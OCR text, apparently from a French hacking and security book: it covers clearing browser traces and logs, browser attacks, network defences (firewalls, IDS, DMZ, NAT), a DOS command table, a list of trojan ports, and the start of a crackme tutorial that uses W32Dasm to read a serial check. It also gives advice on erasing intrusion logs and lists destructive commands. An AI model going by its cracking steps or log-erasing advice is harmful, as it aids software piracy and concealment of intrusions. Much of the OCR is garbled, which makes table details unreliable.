(3 FSl & I SS>Redierdw Ha Fa voris "SfMedia £11 IV A 131 - H 

_?jx|r 

General j Securite j Confidentialite Contenu | Connexions j Programmes | Avance j 



Cieitionnaire d'acee; 



Le controle d'acces vous permet de controler le type de conlenu 
tSj$ Interne! qui peut etre visualise sur cet ordinateur. 



Utiliser les certificats pour vous identifier clairement, ainsi que les 
autorites de certification et lei editeurs. 



Editeurs... 



Informations personnels 

k La saisie semi-aulomatique slocke les 
? entrees precedentes et suggere des 
' correspondances. 



L'Assistant Profil Microsoft slocke vos 
informations personnelles. 




Repertoire 



Saisie semi-automatique.^H 




j?Jxl 



La saisie serni-autumatrque repertorie les correspondances 
possibles a partir des entrees que vous avez deja entrees, 



Utiliser la saisie semi-automatique pour 
[7 AdressesWeb 
17 Formulaires 

</ Norns d'utilisateur et mot 5 de passe sur les formula ires 
17 Demander I'enregistrement des mots de passe 



Eff acer I'Historique de la saisie semi-automatique 
Effacer les forrnulalres~^j> 4 



J our effacer les entrees des adresses Web, choisissez 
Option; Internet , clique: sur I'onglei Henei al, pui; ;ur 
Effacer I'Historique , 



~3 ^OK 



£ Internet 
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l'historique : 



II permet de retourner rapidement sur des sites deja visites. Mais vous ne 
voudriez pas que ceux qui partagent votre PC accedent a l'historique et encore 
mo ins au sites que vous avez visites. 



Pour supprimer les informations contenues dans l'historique, il vous suffit de 
cliquer sur le bouton Effacer l'historique dans l'onglet General des Options 
d'internet (de la meme facon avec Netscape Communicator). 



fc l,MMJia,[J,l,II.IIJ.,IJ J»!.5BH1 



JPjxJ 

General | Securite | Confidentialite j Contenu] Connexions] Programmes | Avance| 
fl Page de de mar rage 



aj 



Vous pouvez c hoi sir la page a utiliser comme page de de mar rage. 
Adresse : [jjj 



Fichiers Internet temporaires 

i V. Les pages Web que vous consultez sont stockees dans un dossier pour 
£ Y un alfichage ulterieur plus rapide. 

Supptimer les cookies.. . | Supprimer les lichiers... j Parametres... 



3 * 



dossier Historique contient les liens vers les pages que vous avez 
[ei-ernrnenr aliiciiee:. arm d'y acceder -apidernenf 



Jours pendant lesquels ces 
pages sont conservees : 



Effacer I'Historique 



Langues... | Accessibility ... | 



)usle 

£j France 



J'ai de la chance 



5 francophones C I 



: France 



jiiupu,. de ■ I- 1 _. ■_■ _ q [ i.' ■ Gouqle.Lurn in Enqlisli 



die en pa an - dfy < jgj 



pages MM) rscensees par Google : 3.083.324,652. 



T] ^o, 

3 



0 Internet 
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General j Securite | Confidentiality | Contenu | Connexions j Programmes | Avance | 
Page de demarrage 

V Vous pouvez choisir la page a utiliser comme page de demarrage. 



Adresse : | http: //www. google.com/ 
Page actuelle | Page par defaut Page vierge | 



Fichiers Internet temporaires 



, \, Les pages Web que vous consultez sont stockees dans un dossier pour 
a| y un affichage ulterieur plus rapide. 



Supprimei les cookies... Supprimer les fichiers... 



do.v.iei Hi:.iunqiie coniieni le.: her-.; ■■er:. e: page.: que vou:. 2-e: 
recerriment al lichee:, atin d\ aceeder lapidement 



Jours pendant lesquels ces 
pages sort consetvees : 



EUaeei I'Hislunque 



l-aa-a. 



)uQle 

£j France 



gle 



J'ai cte la chance 



■ R-jiTienrh-; 3"3ri'>:* 

■ Preferences 

■ Qijtils hnguistigues 



C Pages francophones C Pages ; France 



Langue 



Voulez-vous vraiment que Windows supprime I'Histoiique des sites Web visites ? 



3 fia 



le cache : 

C'est une zone qui permet de ne pas recharger toutes les pages d'un site a 
chaque visite. Le probleme est que Ton peut y aceeder, done savoir tout ce que 
vous avez vu pendant votre temps passe sur internet. 

Pour supprimer le cache, vous devez cliquer sur le bouton Supprimer les 
fichiers dans l'onglet General des Options d'internet. (Avec Netscape 
Communicator, vous devez aller dans la categories Avancees, selectionner la 
section Cache et cliquer sur le bouton Vider le cache sur disque) Vous pouvez 
aussi redefinir la taille pour le stockage du cache (en le mettant a lko par 
exemple). 
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Voulez-vous supprimer tous les f letter s du dossier des 
fichiers Internet ternporaires (Temporary Internet Files) ? 

Vous pouvez egalement supprimer tous les elements 
dispijmbbs hut? connexion enregistres localernent. 

I* Supprimer tout le contenu hors connexion 

OK Annuler I 



JLjxj 

nmes | Avarice | 



i V Les pages Web que vous wnaJtez sont stockees dans on dossier pour 
£ y un affichage ulteiieur plus rapide. 

Supprimer les cookies..- Supprimer les fichiers. .. Parametres... 



Historique 



Le dossier Historique contient les liens vers les pages que vous avez 
recemrnent affichees, afin d'y acceder rapidement. 



Jours pendant lesquels ces 
pages sont conseivees : 



Fa 



Eflacer I'Histonque 



Langues... 



Appliquer 



"3 




Groupes 



Repertoire 



J'ai de la chance 



■ Preferences 

• 0 mils linguisttguas 



C Pages francophones C Pages : France 



A propos de Google - Gooate.com in English 

cile en page d'accueil 

sages Web recensees par Google : 3,083.324,652. 



£ Internet 
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General ] Securite | Conlidentialite | Contenu | Connexions] Programmes] Avancej 
Page de demarrage 

|~~^ Vous pouvez choisir la page a utiliser comme page de demarrage. 

| htlp:V/ www. google.com/ 



Page actuelle 



Page par defaut 



Page vierge 



Fichiers Internet temporaires 

i - V| Les pages Web que vous consultez sonl stockees dans un dossier pour 
; g V un affichage ulterieur plus rapide. 

Supprimer les cookies... [ Supprimer les fichiers... | Parametres.. . | 



(^Jj France 



Groupes 



Repertoire 



Le dossier Historique contien! les liens vers 

recemrnent affichees, afin d'y acceder rapii i \i Verifier s'il existe une version plus recente des pages enregistrees : 
j§ I C A chaque visite de la page 



Jours pendant lesquels ces 
pages sont conservees : 



C A chaque demarrage de Internet Explorer 
C Automatiquement 
(* Jamais 

Dossier Temporary Internet files 



Emplacement a due I : 



C:\Documents and 
Settings\Administrateur\Local 
Settings\ Temporary Internet Files\ 



Espace disque a utiliser : 



T3 



Deplacer le dossier... Affichei les fichiers.. . Afficher les ob)ets., 



■ Pr^tt?ri?ri.:.^ = 

• Out Us linguistiqijes 



~3 &<* 



31 



m 



"rrrfwm* 



j 
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les traces stockees a distance : 



Les fichiers stockant des informations sur les visiteurs d'un site ou d'un serveur 
sont appeles fichiers « logs » (les pirates reconnaitront ici les fichiers qui enregistrent 
leurs activites sur un systeme et qu'ils doivent absolument effacer). 

II y a les logs (qui enregistrent les acces a des ressources ou services), les logs 
referer (qui enregistrent l'adresse de la page sur laquelle on etait avant de se retrouver 
sur le serveur courant), les logs agents (qui enregistrent les navigateurs visitant le 
serveur)... 



Parades : 

Utiliser des serveurs proxys, ou passer par des services d'anonymat proposes par des 
sites comme anonymizer.com. 



Maintenant, voyons deux types de failles generiques pouvant porter atteinte a 
l'integrite et la confidentialite des informations stockees sur vos systemes. 

On va parler des technologies permettant de decouvrir ou creer des failles dans les 
navigateurs, on ne parlera pas des failles specifiques comme l'attaque du Cache 
Cow... 

La suite pourra donner des idees aux hackers qui recherchent des failles sur les 
systemes ou aux concepteurs de navigateurs dans le but de securiser leurs 
programmes. 



les attaques par deni de services (attaques DoS) : 

On peut exploiter ces failles grace a du javascript (que l'on placera sur une page 
web) qui pourrait par exemple ouvrir des centaines de pages et la seule maniere de 
les enlever serait de redemarrer sa machine. 

Referez-vous au chapitre sur les attaques de refus de services pour avoir d'autres 
idees d' attaques. 



les atteintes a la confidentialite : 

ActiveX, cette « magnifique » (ces createurs, dont je ne donnerai pas le nom, 
devraient se cacher) technologie, est un outils a double tranchant car il permet de 
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contourner des securites et d'acceder a des repertoires ou fichiers des internautes 
visitant la page ou est place cet element dangereux. 

Le javascript, permet aussi d'acceder a des fichiers personnels des internautes 
visitant la page ou est place le script malsain. 



Parades : 

Vous ne devez visiter que les sites de confiance et mettre a jour regulierement votre 
navigateur a l'aide des patchs des editeurs. Vous pouvez aussi reconfigurer les 
parametres de votre navigateur en desactivant le Java et le Javascript et installer un 
firewall sur votre ordinateur (comme Zone Alarm). 



securiser son systeme : 

Dans cette partie, nous allons voir les differentes technologies nous permettant de 
proteger nos systemes contre les agressions pouvant se passer par le biais d'internet. 
Ces technologies sont les antivirus, les firewalls, les IDS, les architectures reseau 
securisees, les serveurs proxys, le NAT, SSH, PGP, et les protocoles 
d'authentification securisees. 



les antivirus : 

Les antivirus sont des logiciels qui servent a detecter les virus, chevaux de trois, et 
autres fichiers infectant et infectes. II existe plusieurs types d' antivirus avec leurs 
methodes specifiques pour eradiquer les virus (pour plus informations, referez-vous 
au chapitre sur la lutte anti-virale) . 

Voici une liste de certains antivirus : 
• Panda Antivirus 
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* Panda Antivirus 6.0 Platinum 



Fichier Affidiage Atteindre Outils Aide 



Commencer 


<P 
Arriere 


^> 
Avant 


Debut 


Impnmer 





nntiuirus 6.0 

t PLPlTINUrvl 



Bienvenue.Nous vous remercions de faire confiance a Panda Antivirus Platinum, l'anti- virus 
VIVANT ! 



Demarrage de Panda Antivirus.,, Acces aux services Pour mieux nous connaTtre 

Important : Panda Antivirus Platinum est concu tant pour les utilisateurs confirmes que pour les 
debutants. II comprend deux modes de fonctionnement : e'le'mentaire et avance'. Sitous deux foumis sent 
une protection optimal*, le mode avance permet de mettre a profit toute la puissance du produit. 

[Plus d'informationsl. Commencer en [Mode elementairel. [Mode avancel 



r- V- \l ~\\ 

I Ne pas afficher cette presentation lors du demarrage. 



/a 



• VirusScan de McAfee 

• Antivirus Kapersky 

• Norton Antivirus 

• OpenAntivirus ( pour les systemes UNIX/LINUX ) 

• Antivir 



les firewalls : 

(cf le chapitre sur les murs par-feu et leur contournement) 
Voici differentes firewall aussi bien gratuit que commerciaux : 

• Norton Firewall 

• McAfee Personal Antivirus 

• ZoneAlarm 
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lJ2 Zone Alarm 



NE 




Overview 

Fiiew.ill 

Program 
Control 

Alerts & 
Logs 

E-mail 
Protection 



Firewall 

The firewall protects you 
from dangerous traffic. It 
has two Zones. 

Internet Zone: For 
protection from unknown 
computers. 

Trusted Zone: For sharing 
with trusted computers. 

The Internet Zone contains 
all of the computers on the 
Web by default. Use the 
Zones tab to add 
computers to the Trusted 
Zone. 

For more advanced control 
of Zones, including 
networking, privacy 
controls, and creation of a 
Blocked Zone, choose 
Zone Alarm Pro. 





Hlijli 




Med. 



PROGRAMS 

i - J I ; 

©Help 

Main Zones 



Me<lilim: Visible but protected mode: Computers 
can see your computer but cannot share 
its resources. Incoming NetBIOS is 
blocked. This setting is recommended 
for temporary use in the Internet Zone. 



ted Zone 



t! 



Hi m I i 
Med. 



Advanced 



Medium: Sharing mode: Computers can see 
your computer and share its 
resources. T his setting is 
recommended for the Trusted Zone 



Internet Explorer connecting to Internet. 



les IDS : 

(cf le chapitre sur les IDS pour savoir a quoi ils servent et comment il fonctionne) . 
Voici une liste d'IDS : 

• Snort 

• Guard de ISS 

• Cisco Secure IDS de CISCO SYSTEMS 

• Dragon Squire de INTERASYS NETWORK 



architectures reseaux securisees : 

La securite dun reseau passe aussi par une bonne gestion de la disposition des 
systemes dans ce dernier. 

Vous devez attentivement et soigneusement definir l'architecture finale du reseau. 

Une architecture securisee ne veut pas dire une architecture n'ayant aucune 
faille/vulnerabilite. Vous devez bien sur configurer et patcher vos systemes comme il 
le faut, sinon, aussi securisee qu'elle soit, l'architecture de votre reseau ne repoussera 
pas les attaques de bons pirates. 

Les differentes architectures expliquees ici sont basee sur la construction d'une DMZ 
(zone demilitarisee). Ce sera la seule zone ouverte a internet: elle va contenir tous les 
elements utilisant internet dans leurs fonctionnements ou proposant des services sur le 



246 



net (comme les serveurs Web, FTP, mail. . .) et elle va adopter des strategies de 
defense visant a diminuer les possibilites d'attaque. 

Les differentes architectures ont aussi pour but de fournir a l'entreprise les services 
d' internet (comme faire un site dans le but de laisser sa trace sur la toile. . .) sans pour 
autant laisser les systemes du reseau prive de l'entreprise acceder a internet. Si vous 
voulez que tous les systemes du reseau de l'entreprise puisse acceder a Internet, vous 
pouvez utiliser la technologie NAT ou NPAT en plus de la DMZ ou sans cette 
derniere. Nous verrons en dernier les possibilites offertes par NAT et NPAT. 



Avant de continuer, ce present chapitre a seulement pour but de vous informer sur le 
comment de la mise en place dun reseau securise, cela ne vous dispense en aucun cas 
de faire appel a un ingenieur reseau et systeme qui vous mettra votre reseau en place 
car premierement ce dernier a fait des etudes dans ce domaine done est plus 
competent que tout patron ou autres personnes voulant mettre en place le reseau, 
deuxiemement, il sera le seul a pouvoir reagir spontanement lors de problemes dans la 
mise en place du reseau (aussi bien des problemes d'espace que de temps. . .). 



• une DMZ classique : 

Placez d'un cote le reseau interne, de l'autre cote votre acces a internet, mais ne les 
reliez pas encore. 

Entre ces deux parties, mettez deux systemes de filtrage de paquets (firewall/routeur). 

Maintenant, placez entre ces deux systemes de filtrage, tous les systemes utilisant 
internet pour fonctionner. 

Pour finir, vous allez devoir configurer le systeme de filtrage connectant la DMZ a 
internet de sorte qu'il n'accepte que les paquets en direction d'elements etant dans la 
DMZ done tous les paquets en direction d'un systeme se situant dans le reseau prive 
doivent etre detruits, journalises. . . 

Vous pouvez configurer le systeme de filtrage connectant la DMZ au reseau prive 
comme vous le voulez. 

• une DMZ un peu plus evolue : 

Cette architecture est semblable a une DMZ classique, la seule difference est que Ton 
va utiliser ce que Ton appelle « une bascule de protocole » : e'est-a-dire que la DMZ 
ne va pas utiliser la pile de protocole TCP/IP. Elle va utiliser un autre protocole entre 
les deux systemes de filtrage ou de routage. 

Vous pouvez aussi faire du tunneling ou creer votre propre protocole securise. 

• NAT et NPAT : 

NAT (Network Adress Translation) est un systeme qui permet d'attribuer une adresse 
publique (du Net) a chaque adresse privee du reseau. 
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NPAT (Network Port Adress Translation) est un systeme qui permet d'attribuer une 
adresse publique pour toutes les adresses privees du reseau. 

Ces deux systemes sont a la fois des solutions pour des eventuels problemes 
d'adressage mais aussi des solutions pour securiser son reseau prive car lorsque un 
pirate se trouvera en face d'un reseau utilisant NAT/NPAT, il verra seulement, lors de 
son scan, une seule machine (ayant 1' adresse IP public) et ne se doutera peut-etre pas 
qu'elle cache un reseau. 

Certains diront : « oui, ces technologies sont superbes mais cela implique de 
concentrer tous les services sur une seule machine ! » 

Et bien non, il suffit de configurer la machine (qui serait soit un routeur, soit un 
firewall) de sorte que toutes les requetes en direction d'un port specifie soit redirigees 
vers le systeme qui s'occupe de traiter les requetes ont redirigees. 
Cela s'appelle le Port Forwarding. 

la politique de securite : 

Une bonne securite passe par une bonne gestion du pare informatique, par des mis a 
jour frequentes des logiciels, base de donnees, mais aussi par des audits des systemes 
et logiciels du reseau et par une sensibilisation des personnes de l'entreprise ou de la 
famille. 



audits : 

Arrive a ce stade du livre, nous sommes maintenant capables de decouvrir des 
vulnerabilites/failles d'un reseau ou de logiciels en nous aidant de scanners de 
vulnerability comme nmap, SATAN, SAINT, Whisker, Nessus... 

Lorsqu'une machine a ete piratee, analysez immediatement les fichiers logs dans le 
but d'etablir une feuille d'etat. Cette feuille devra principalement contenir: 

les acces reseaux au systeme ayant ou non reussis. 

les acces locaux a des fichiers locaux ayant ou non reussis. 

les divers evenements (programmes lances, plantages. . .) etant 

survenus sur le systeme. 

tous les comptes du systeme avec leur UID, les dates et heures 
de connexion des utilisateurs. . . 



sensibilisation : 
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Cette etape est tres importante car certains pirates vont preferer s'attaquer a des 
systemes en passant par les utilisateurs grace a des techniques comme le social 
engineering... 

C'est pour cela qu'il faut organiser des conferences de sensibilisation ou Ton 
expliquera aux utilisateurs (employes, amis, famille. . .) de ne pas ouvrir n'importe 
quel message contenant ou non des pieces jointes, de ne pas donner n'importe quelles 
informations a des personnes (que ce soit au telephone, dans un mail. . .), de contacter 
l'administrateur reseau des qu'ils detectent une erreur ou un comportement douteux 
d'un logiciel ou d'un systeme, de changer regulierement de mot de passe, et le plus 
important qui est de ne pas choisir des mots de passe trop evident. 

Ce chapitre a presente quelques points importants dans la mise en place de systemes, 
de politiques de protection de la confidentialite, de l'integrite des reseaux et systemes 
d' informations. 

Pour avoir de meilleurs conseils, vous devez collecter des informations regulierement 
mises a jour en rapport a vos activites dans le reseau (veille, l'administration du pare 
informatique, securite...) a l'aide de newsletters, de moteurs de recherche, d' agents 
intelligents, de journaux/magazines (comme le MISC, le The Hackademy Journal...) 
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Les commandes DOS 



rrl 
CU.. 


r eimei ue leveim du lepeiione 
precedant. 


rrl \ 
CU \ 


_rCIIIlCL Uc at ICIIU-IC all ICpClLUlIC laClIlC. 


cu [icpcrnjiicj 


Ppftn 1 /-J t*on /"i ro Hone nn c auc 

repertoire. 




I^UIIIIC a 1 UllllaalcUI 1c C11U1A CIlLIc UCa 

propositions. 


els 


_rCIIIlcL U. CllaLCI 1 CLIall JJUo. 


copy [fichier] [repertoire] 


Permet de copier un fichier dans un 


cuy 


L-//~vv*iti s^il Ho nor" AMHPr>tpf o r> oimdi* ^ 

r ermei ue ueconnecier le ciavier ei 

1 'pmn rln FIDS 


debug 


La celebre commande qui n'est plus a 


Hf^l r 11 r* n i f*v\ 
U-Cl L11C111CIJ 


Prini-) H ci innnnipi* lin fiPnipr 

_rciiiiCL U.C auppiiiiici uii iiciiici. 


dir /p 


Permet d'afficher le contenu d'un 

rpnpffrtirA nliicipni*c fnic 
ICpClLUllC Cll piUMCUlo lUlo. 


dir [repertoire] 


Permet d'afficher le contenu d'un 
repertoire. 


dir [lettre]* 


Permet de voir les fichiers commencant 

pal la it III c paaaCC Cll algUIIlCIll. 


dir [lecteur] 


Permet de voir les fichiers d'un lecteur. 


QisKcopy [lecteur i j [lecteurzj 


rermet ue copier ues uisquenes. 


@echo off [commande] 


Permet de cacher les commandes qui 
suivent aux yeux ue i utnisateur. 


Echo. 


Permet de sauter une ligne. 


Edit [texte] 


Permet d'editer un fichier et de 
l'afficher. 


Erase [richer] 


Permet de supprimer un fichier. 

ATTFNTTON r-pttp r-ntntnnnrlp pit 

dangereuse car elle supprime le fichier 
sans demander l'accord de l'utilisateur. 


fdisk 


Permet de creer et de supprimer des 
partitions disques. 


Format [lecteur] 


Permet de formater un lecteur 
quelconque. 


F3 


Permet 


goto 


Permet d'effectuer un branchement 
direct. 


if 


Permet d'effectuer un branchement 
conditionnel. 
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mem 


Permet d'afficher l'espace disque 


mkdir [repertoire] 


Permet de creer un repertoire. 


pause 


Permet de stopper un programme le 
temps que l'utilisateur appuie sur une 
touche pour le continuer. 


recover 


Permet de supprimer tous les fichiers et 
repertoires du disque dur. ATTENTION, 
cette commande est dangereuse car elle 
ne demande pas la confirmation de 
l'utilisateur. 


ren [fichier]. [nouvelle extension] 


Permet de modifier l'extension d'un 
fichier. 


rename [ancien] [nouveau] 


Permet de renommer un fichier. 


rmdir [repertoire] 


Permet d'effacer un repertoire. 


type [fichier txt] 


Permet d'afficher le contenu d'un fichier 
texte. 


ver 


Permet de connaitre le version du DOS. 


vol [lecteur] 


Permet de connaitre le nom d'un lecteur. 


C:\Windows\...\*.* 


Permet d'obtenir le contenu d'un 
repertoire. Par mesure de securite, une 
autorisation est demandee. 


C:\WindowsV . A*, [extension] 


Comme le precedant sauf qu'il n'affiche 
que les fichiers ayant une certaine 
extension. 
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Ports utilises par certains troyens 



Port utilise 

19 

21 

31 

41 

80 
99 

113 

119 
121 
123 
146 
170 
421 
456 

555 

666 

669 

911 

999 

1000 

1001 

1010 

1011 

1012 

1015 

1016 



Le cheval de troie 

Chargen 

Blade Runner 
Invisible FTP 
Net Administrator 

Hackers Paradise 
Masters Paradise 

Deep Throat 

RingZero 

Hidden Port 

Invisible Identd Deamon 
Kazimas 

Happy 99 

JammerKillah 

Net Controller 

Infector 

A-trojan 

TCP Wrappers 

Hackers Paradise 

NetAdministrator 
Phase Zero 

Attack FTP 
Back Construction 

DP Trojan 

Dark Shadow 

Deep Throat 

Der Spacher 3 

Silencer 

Doly Trojan 

Doly Trojan 

Doly Trojan 

Doly Trojan 

Doly Trojan 
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1020 


Vampire 


1024 


NetSpy 


1025 


Maverick's Matrix 


1033 


ICQ Trojan 


1045 


Rasmin 


1050 


MiniCommand 


1080 


WinHole 


1081 


WinHole 


1082 


WinHole 


1083 


WinHole 


1099 


Bfevolution 




RAT 




Psyber Stream Server 


1170 


Streaming Audio trojan 




Voice 


1200 


NoBackO 


1201 


NoBackO 


1207 


SoftWAR 


1212 


Kaos 


1225 


Scarab 


1234 


Ultors Trojan 




BackDoor-G 


1243 


Sub Seven 




SubSeven Apocalypse 


1255 


Scarab 


1257 


Sub Seven 2.1 


1349 


BO DLL 


1394 


BackDoor 


1 a no 




1524 


Trinoo 


1600 


ni * 1 t-j 1 

Snivka-Burka 


1777 


Scarab 


1807 


SpySender 


1966 


Fake FTP 


1969 


OpC BO 


1981 


Shockrave 


1999 


BackDoor 




TransScout 



255 



2140 Deep Throat, The Invasor 

2155 Illusion Mailer 

2565 Striker 

2583 WinCrash 

2600 Digital RootBeer 

2716 The Prayer 

2721 Phase Zero 

2773 SubSeven 

3128 RingZero 

3129 Masters Paradise 

3150 Deep Throat 

3456 Teror Trojan 

24$g Eclipse 2000 

Sanctuary 

3700 Portal of Doom 

3791 Eclypse 

3801 Eclypse 

4000 Skydance 

4092 WinCrash 
4242 Virtual hacking Machine 

4444 Prosiak 

4590 ICQTrojan 

5000 Sockets de Troie 

5001 Sockets de Troie 

5032 NetMetropolitan 

5321 Firehotcker 

5343 wCrat 

Blade Runner 
Back Construction 

Blade Runner 
Back Construction 

Blade Runner 
Back Construction 

5521 Illusion Mailer 

5550 X-Tcp Trojan 

5555 ServeMe 

5556 BO Facil 
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5557 BO Facil 

5569 Robo-Hack 

5637 PC Crasher 

5638 PC Crasher 
5666 PC Crasher 
5742 WinCrash 
5888 Y3KRAT 
6000 The Thing 
6272 Secret Service 
6400 The Thing 
6667 Schedule Agent 

6669 Host Control 

6670 Deep Throat 

WinNuke eXtreame 

6711 SubSeven 

6?12 Funny Trojan 

SubSeven 

6713 SubSeven 

6723 Mstream 

6771 Deep Throat 

6y76 2000 Cracks 

SubSeven 

6838 Mstream 

6912 ShitHeep 

6939 Indoctrination 

6969 NetController 

6970 GateCrasher 

jqqq Remote Grab 

SubSeven 

7001 Freak88 

7215 SubSeven 

7300 NetMonitor 

7301 NetMonitor 

7302 NetMonitor 

7303 NetMonitor 

7304 NetMonitor 

7305 NetMonitor 
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7306 


NetMonitor 


7307 


NetMonitor 


Tl AO 

7308 


NetMonitor 


7309 


NetMonitor 


7323 


Sygate Backdoor 


7424 


Host Control 


7424 


Host Control 


7789 


Back Door Setup 




ICKiller 


7983 


Mstream 


8080 


RingZero 


8787 


Back Orifice 2000 


8897 


HackOffice 


8988 


BacHack 


8989 


Rcon 


9000 


Netministrator 


9325 


Mstream 


9400 


T /"I 1 

InCommand 


9o72 


rortal ot Doom 


9o7o 


Cyber Attacker, KUa 




1 ne rrayer 


10067 


Portal of Doom 


10085 


O 1*11* 

Sypnilhs 


10086 


n 1 * 1 1 * 

Sypnilhs 


10101 


BrainSpy 


10167 


Portal of Doom 


10498 


Handler to Agent 


10528 


TT A- /"< A- 1 

Host Control 


10520 


Acid Shivers 


10607 


Coma 


10666 


A 1 1 

Ambush 


11000 


Senna Spy 


11051 


Host Control 


11223 


Progenic trojan 


12076 


Gjamer 


12223 


Hack '99 KeyLogger 
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NetBus 


12345 


Pie Bill Gates 


12346 


NetBus 


12349 


BioNet 


12361 


Whack-a-mole 


12456 


NetBus 


12623 


DUN Control 


12624 


Buttman 


12631 


WhackJob 


12701 


Eclipse 2000 


13000 


Senna Spy 


1 1 A 1 A 

13010 


Hacker Brazil 


15092 


Host Control 


16484 


Mosucker 


16772 


ICQ Revenge 


16969 


Priority 


17166 


Mosaic 


17300 


Kuang2 The Virus 


17777 


Nephron 


18753 


Shalt 


19864 


ICQ Revenge 


^ f\f\f\f\ 

20000 


n if * 1 1 

Millennium 


20034 


NetBus 2 Pro 


20203 


Chupacabra 


2033 1 


Bla 


20433 


Shalt Agent to handler(s) 


'"S \ r A A 

21 544 


CrirlFriend 


21554 


GirlFriend 


22222 


Prosiak 


23023 


Logged 


23432 


Asylum 




Evil FTP 




Ugly FTP 


26274 


Delta Source 


26681 


Spy Voice 


27374 


SubSeven 


27444 


Trinoo 
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27573 SubSeven 

27665 Trinoo 

29104 Host Control 

30029 AOL Trojan 

30100 NetSphere 

30101 NetSphere 

30102 NetSphere 

30103 NetSphere 
30103 NetSphere 
30133 NetSphere 
30303 Sockets de Troie 
30947 Intruse 
30999 Kuang2 
31335 Trinoo 



Bo Whack 
ButtFunnel 

BO client 
B02 

BackFire 
Back Orifice, 

31338 NetSpyDK 



31336 
31337 
31337 



31338 



Back Orifice 
DeepBO 

31339 NetSpyDK 

31666 BOWhack 

31785 Hack'a'Tack 

31787 Hack'a'Tack 

31788 Hack'a'Tack 

31789 Hack'a'Tack 

31790 Hack'a'Tack 

31791 Hack'a'Tack 

31792 Hack'a'Tack 
32100 Project nEXT 
32418 Acid Battery 
33577 PsychWard 
34555 Trinoo (Windows) 
35555 Trinoo (Windows) 
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37651 


YAT 


40412 


The Spy 


40421 


Masters Paradise 


40422 


Masters Paradise 


40423 


Masters Paradise 


40425 


Masters Paradise 


40426 


Masters Paradise 


41666 


Remote Boot 


41666 


Remote Boot 


A A A A A 

44444 


Prosiak 


47252 


Delta Source 


49301 


Online KeyLogger 


50505 


Sockets de Troie 


50766 


Fore 


50776 


Fore 


54320 


Back Orifice 2000 


54321 


School Bus 


54321 


Back Orifice 2000 


60000 


Deep Throat 


61348 


Bunker-Hill 


63485 


Bunker-Hill 


65000 


Devil 


65432 


The Traitor 
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Cracking (Tune application 



Alors, nous allons, dans cette annexe, mettre en pratique ce que nous avons appris 
dans le chapitre consacre au piratage logiciel. De plus, nous allons apprendre a nous 
servir d'un desassembleur (W32Dasm) avec un crackme. 

Je ne me souviens plus ou j'ai telecharge ce crackme car je l'ai retrouve il y a deux 
semaines dans un de mes dossiers alors que je recherchais un fichier. 

Bon, commencons par analyser cette mini-application. 



Name 



1 




Serial 




1 | 








CHECK 


[ QUIT | 



Alors, quand on la lance, elle nous demande d'entrer un nom et un numero de serie. 
Quand on essaie de valider un faux nom et un faux numero de serie, elle nous 
affichent : 



One of the Details you entered was wrong 

IzIqlIIjI 



Dans un premier temps, desassemblons le crackme, a l'aide de W32Dasm. Nous 
obtenons un listing ASM de 33 pages. 

Maintenant, analysons les donnees que l'on a pour pouvoir cracker cette application. 

Nous avons, ce que l'on appelle des labels ('Name', 'Serial', 'error' et 'One of 
the Details you entered was wrong'). Le plus important ici est le message 
d'erreur (le dernier label). 

A l'aide de W32Dasm, rendons-nous dans ce que l'on appelle les String data 
reference . 
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SJ URSoft W32Dasm Ver 8.9 Program Disassembler/Debugger 



Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 

Disassembly of File: crackme2.exe 
Code Offset = 00001000, Code Size = 00001000 
Data Offset = 00003000, Data Size = 00001000 

Number of Objects = 0004 (dec), Imagebase = 00400000h 



Jfl|x] 



ObjectOI 
Object02 
Object03 
Object04 



.text RVA: 00001000 Offset: 00001000 Size: 00001000 Flags: B000002D 

.rdata RVA: 00002000 Offset: 00002000 Size: 00001000 Flags: 40000040 

.data RVA: 00003000 Offset: 00003000 Size: 00001000 Flags: C0000040 

.rsrc RVA: 00004000 Offset: 00004000 Size: 00001000 Flags: 40000040 



+++++++++++++++++++ MENU INFORMATION 

There Are No Menu Resources in This Application 

+++++++++++++++++ DIALOG INFORMATION ++++++++++++++++++ 

Number of Dialogs = 1 (decimal) 

Name: DialoglD_00B6, #of Controls=000, Caption:"xb" 

+++++++++++++++++++ IMPORTED FUNCTIONS ++++++++++++++++++ 
Number of Imported Modules = 4 (decimal) 

Import Module 001: MFC42.DLL 
Import Module 002: MSVCRT.dll 
Import Module 003: KERNEL32.dll 
Import Module 004: USER32.dll 

+++++++++++++++++++ IMPORT MODULE DETAILS +++++++++++++++ 

Import Module 001: MFC42.DLL 



Addr:800009FA hint(09FA) Name: MFC42:NoName0000 
Addr:800009D0 hint(09D0) Name: MFC42:NoName0001 
Addr:80001663 hint(1663) Name: MFC42:NoName0002 
Addr:80000F52 hint(0F52) Name: MFC42:NoName0003 
Addr:80001186 hint(1186) Name: MFC42:NoName0004 



Lme:0 Pg 1 of 33 File:crackme2.ene 




Dans la nouvelle fenetre qui s'ouvre, double cliquez sur le message d'erreur 'One of 
the Details you entered was wrong'. 

Ceci devrait nous amener a l'endroit ou il est utilise dans le code source (soit a cette 
ligne : 

:0040153D 6838304000 push 00403038.) 



Pour comprendre comment nous arrivons a ce message d'erreur, il va falloir remonter 
de quelques lignes dans le code source. 
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53 URSoft W32Dasni Ver 8.9 Program Disassembler/Debugger 



Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 



004014FE E841030000 
00401503 8DBEE4000000 
00401509 8BCD 
00401 50B 57 

R e f 

00401 50C E833030000 
00401511 8B07 
00401513 803836 
00401516 751 E 
00401518 80780132 
0040151C7518 
00401 51 E 80780238 
00401522 7512 
00401524 80780337 
00401528 750C 
00401 52A 8078042D 
00401 52E 7506 
00401530 80780541 
00401534 7417 



Call 00401844 
lea edi. dword plr |esi+O00000E4] 
mov ecx, ebp 
push edi 



Call 00401844 
mov eax, dword ptr [edi] 
cmp byte ptr [eax], 36 
jne 00401536 

cmp byte ptr [eax+01 ], 32 
jne 00401536 

cmp byte ptr [eax-ttG], 38 
jne 00401536 

cmp byte ptr [eax-KB], 37 
jne 00401536 

cmp byte ptr [eax-rfM], 2D 
jne 00401536 

cmp byte ptr [eax-KB], 41 
je 00401 54D 



* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:004014E4(C), :004014F3(C), :00401516(C), :0040151C(C). :00401522(C) 
|:00401528(C),:0040152E(C) 



push 00000000 

s i b I 
push 00403064 

s i b I 



push 00403038 
mov ecx, esi 




:0040153D 6838304000 
:00401542 8BCE 




R e f f r 



R e f f r 



jU J 



Line:886 Pg 1 3 and 1 4 of 33 FilexrackmeZexe 



Dans ce code, nous apercevons certaines instructions qui font des comparaisons et des 
